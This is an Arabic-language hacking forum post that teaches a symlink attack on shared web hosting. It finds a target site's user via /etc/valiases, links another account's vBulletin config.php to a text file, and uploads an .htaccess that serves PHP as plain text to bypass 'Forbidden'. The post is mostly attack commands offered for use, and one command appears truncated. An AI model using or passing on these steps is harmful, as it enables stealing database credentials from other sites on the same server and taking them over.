عرض مشاركة واحدة
قديم 10-06-2012, 08:45 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
Injection
:: Interactive Developer ::
 
الصورة الرمزية Injection
 

 

 
إحصائية العضو





Injection غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Injection is on a distinguished road

افتراضي Call Any Config + Bypass Forbidden


آلسلآم عليكم ورحمه الله وبركاته

بعد القطعة الطويلة نرجع بدرس جديد بآذن آلله ,

أول شيء آعمل مجلد بآسم [ Hamad ] ,

نفذ الامر

كود PHP:
Mkdir Hamad 
بعد ذالك نستخرج يوزر الموقع المستهدف ..

كود PHP:
ls -la /etc/valiases/hamad.com 
غير الرابط الى الموقع المستهدف بعد ذالك مثلا اليوزر

كود PHP:
Hamad 
نسحب الكونفق عن طريق الامر التالي

كود PHP:
ln -/home/sec4/public_html/vb/includes/config.php a.txt 
بعد ذالك نحاول نستعرض الملف [ Forbidden ] الحل ارفع الهاتكس التالي

كود PHP:
Options +FollowSymLinks 
DirectoryIndex Sux
.html 
Options 
+Indexes 
AddType text
/plain .php 
AddHandler server
-parsed .php 
AddType text
/plain .html 
تم التخطي اتمنه الشرح كان وآضح

Special Thankss to : vbspiders & v4-team & Black Hat Team



Call Any Config + Bypass Forbidden

   

رد مع اقتباس